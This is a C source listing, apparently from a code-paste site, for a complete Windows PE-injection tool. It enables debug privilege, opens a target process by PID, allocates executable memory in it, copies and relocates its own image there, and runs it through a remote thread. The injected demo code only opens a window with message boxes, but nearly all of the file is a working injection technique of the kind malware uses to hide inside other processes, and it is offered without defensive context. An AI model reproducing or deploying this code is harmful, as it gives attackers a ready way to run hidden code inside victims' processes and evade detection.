processes inject using pe injection

1. #include <stdio.h>
2. #include <Windows.h>
3. #include <winternl.h>
4.  
5. #pragma comment(lib,"ntdll.lib")
6.  
7. typedef struct _CLIENT_ID
8. {
9.     PVOID UniqueProcess;
10.     PVOID UniqueThread;
11. }CLIENT_ID,*PCLIENT_ID;
12.  
13. EXTERN_C NTSTATUS NTAPI RtlCreateUserThread(
14. HANDLE,
15. PSECURITY_DESCRIPTOR,
16. BOOLEAN,
17. ULONG,
18. PULONG,
19. PULONG,
20. PVOID,
21. PVOID,
22. PHANDLE,
23. PCLIENT_ID);
24.  
25. EXTERN_C PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader(PVOID);
26.  
27. EXTERN_C NTSTATUS NTAPI RtlAdjustPrivilege(ULONG,BOOLEAN,BOOLEAN,PBOOLEAN);
28. EXTERN_C NTSTATUS NTAPI NtOpenProcess(PHANDLE,ACCESS_MASK,POBJECT_ATTRIBUTES,PCLIENT_ID);
29. EXTERN_C NTSTATUS NTAPI NtWriteVirtualMemory(HANDLE,PVOID,PVOID,ULONG,PULONG);
30.  
31. LRESULT CALLBACK WndProc(HWND hWnd,UINT uMsg,WPARAM wParam,LPARAM lParam)
32. {
33.     HDC hDC;
34.     PAINTSTRUCT ps;
35.  
36.     switch(uMsg)
37.     {
38.         case WM_DESTROY:
39.    
40.             PostQuitMessage(0);
41.             break;
42.  
43.             case WM_PAINT:
44.                 hDC=BeginPaint(hWnd,&ps);
45.  
46.                 FillRect(hDC,&ps.rcPaint,0);
47.                 EndPaint(hWnd,&ps);
48.                 break;
49.  
50.            case WM_LBUTTONDOWN:
51.                MessageBox(hWnd,"You clicked the left mouse button.","Message",MB_ICONINFORMATION);
52.                break;
53.            case WM_RBUTTONDOWN:
54.                MessageBox(hWnd,"You clicked the right mouse button.","Message",MB_ICONINFORMATION);
55.                break;
56.  
57.            case WM_KEYDOWN:
58.  
59.                switch(wParam)
60.                {
61.                    case VK_RETURN:
62.                        MessageBox(hWnd,"You pressed the enter key.","Message",MB_ICONINFORMATION);
63.                        break;
64.                    case VK_SPACE:
65.                        MessageBox(hWnd,"You pressed the spacebar key.","Message",MB_ICONINFORMATION);
66.                        break;
67.                    case 'B':
68.                        Beep(800,200);
69.                        break;
70.                }
71.  
72.                break;
73.  
74.            default:
75.                return DefWindowProc(hWnd,uMsg,wParam,lParam);
76.     }
77.  
78.     return 0;
79. }
80.  
81. void WINAPI ThreadProc(HINSTANCE hInst)
82. {
83.     HWND hWnd;
84.  
85.     WNDCLASS wc;
86.     MSG msg;
87.  
88.     memset(&wc,0,sizeof(wc));
89.  
90.     wc.hInstance=hInst;
91.     wc.lpfnWndProc=WndProc;
92.     wc.lpszClassName="PEWndClass";
93.  
94.     RegisterClass(&wc);
95.  
96.     hWnd=CreateWindowEx(
97.         0,
98.         "PEWndClass",
99.         "PE injection window",
100.         WS_OVERLAPPEDWINDOW,
101.         50,
102.         50,
103.         250,
104.         250,
105.         NULL,
106.         NULL,
107.         hInst,
108.         NULL);
109.  
110.     ShowWindow(hWnd,SW_SHOW);
111.  
112.     while(GetMessage(&msg,NULL,0,0))
113.     {
114.         TranslateMessage(&msg);
115.         DispatchMessage(&msg);
116.     }
117.  
118.     UnregisterClass("PEWndClass",hInst);
119.     ExitThread(0);
120. }
121.  
122. int main(int argc,char* argv[])
123. {
124.     PIMAGE_NT_HEADERS pINH;
125.     PIMAGE_DATA_DIRECTORY pIDD;
126.     PIMAGE_BASE_RELOCATION pIBR;
127.  
128.     HMODULE hModule;
129.     PVOID image,mem,StartAddress;
130.     HANDLE hProcess,hThread;
131.     DWORD i,count,nSizeOfImage;
132.     DWORD_PTR delta,OldDelta;
133.     LPWORD list;
134.     PDWORD_PTR p;
135.     BOOLEAN bl;
136.     NTSTATUS status;
137.  
138.     OBJECT_ATTRIBUTES oa;
139.     CLIENT_ID cid;
140.  
141.     if(argc!=2)
142.     {
143.         printf("Usage: PEWindow.exe [PID]");
144.         return 1;
145.     }
146.  
147.     RtlAdjustPrivilege(20,TRUE,FALSE,&bl);
148.  
149.     hModule=GetModuleHandle(NULL);
150.     pINH=RtlImageNtHeader(hModule);
151.  
152.     nSizeOfImage=pINH->OptionalHeader.SizeOfImage;
153.  
154.     InitializeObjectAttributes(&oa,NULL,0,NULL,NULL);
155.  
156.     cid.UniqueProcess=(HANDLE)atoi(argv[1]);
157.     cid.UniqueThread=0;
158.  
159.     printf("\nOpening target process handle.\n");
160.  
161.     if(!NT_SUCCESS(status=NtOpenProcess(&hProcess,PROCESS_ALL_ACCESS,&oa,&cid)))
162.     {
163.         printf("\nError: Unable to open target process handle. NtOpenProcess failed with status %#x\n",status);
164.         return 1;
165.     }
166.  
167.     printf("\nAllocating memory in target process.\n");
168.  
169.     mem=VirtualAllocEx(hProcess,NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
170.  
171.     if(mem==NULL)
172.     {
173.         printf("\nError: Unable to allocate memory in target process. VirtualAllocEx failed with error %d\n",GetLastError());
174.  
175.         NtClose(hProcess);
176.         return 1;
177.     }
178.  
179.     printf("\nMemory allocated. Address: %#x\n",mem);
180.  
181.     image=VirtualAlloc(NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
182.  
183.     memcpy(image,hModule,nSizeOfImage);
184.  
185.     pIDD=&pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
186.     pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)image+pIDD->VirtualAddress);
187.  
188.     delta=(DWORD_PTR)((LPBYTE)mem-pINH->OptionalHeader.ImageBase);
189.     OldDelta=(DWORD_PTR)((LPBYTE)hModule-pINH->OptionalHeader.ImageBase);
190.  
191.     while(pIBR->VirtualAddress!=0)
192.     {
193.         if(pIBR->SizeOfBlock>=sizeof(IMAGE_BASE_RELOCATION))
194.         {
195.             count=(pIBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/sizeof(WORD);
196.             list=(LPWORD)((LPBYTE)pIBR+sizeof(IMAGE_BASE_RELOCATION));
197.  
198.             for(i=0;i<count;i++)
199.             {
200.                 if(list[i]>0)
201.                 {
202.                     p=(PDWORD_PTR)((LPBYTE)image+(pIBR->VirtualAddress+(0x0fff & (list[i]))));
203.  
204.                    *p-=OldDelta;
205.                    *p+=delta;
206.                 }
207.             }
208.         }
209.  
210.         pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)pIBR+pIBR->SizeOfBlock);
211.     }
212.  
213.     printf("\nWriting executable image into target process.\n");
214.  
215.     if(!NT_SUCCESS(status=NtWriteVirtualMemory(hProcess,mem,image,nSizeOfImage,NULL)))
216.     {
217.         printf("\nError: Unable to write executable image into target process. NtWriteVirtualMemory failed with status %#x\n",status);
218.  
219.         VirtualFreeEx(hProcess,mem,0,MEM_RELEASE);
220.         NtClose(hProcess);
221.         return 1;
222.     }
223.  
224.     StartAddress=(PVOID)((LPBYTE)mem+(DWORD_PTR)(LPBYTE)ThreadProc-(LPBYTE)hModule);
225.  
226.     printf("\nCreating remote thread in target process.\n");
227.  
228.     if(!NT_SUCCESS(status=RtlCreateUserThread(hProcess,NULL,FALSE,0,0,0,StartAddress,mem,&hThread,NULL)))
229.     {
230.         printf("\nError: Unable to create remote thread in target process. RtlCreateUserThread failed with status %#x\n",status);
231.  
232.         VirtualFreeEx(hProcess,mem,0,MEM_RELEASE);
233.         NtClose(hProcess);
234.         return 1;
235.     }
236.  
237.     printf("\nThread created. Waiting for the thread to terminate.\n");
238.  
239.     NtWaitForSingleObject(hThread,FALSE,NULL);
240.  
241.     printf("\nThread terminated.\n");
242.  
243.     NtClose(hThread);
244.  
245.     printf("\nFreeing allocated memory.\n");
246.  
247.     VirtualFreeEx(hProcess,mem,0,MEM_RELEASE);
248.     NtClose(hProcess);
249.  
250.     VirtualFree(image,0,MEM_RELEASE);
251.     return 0;
252. }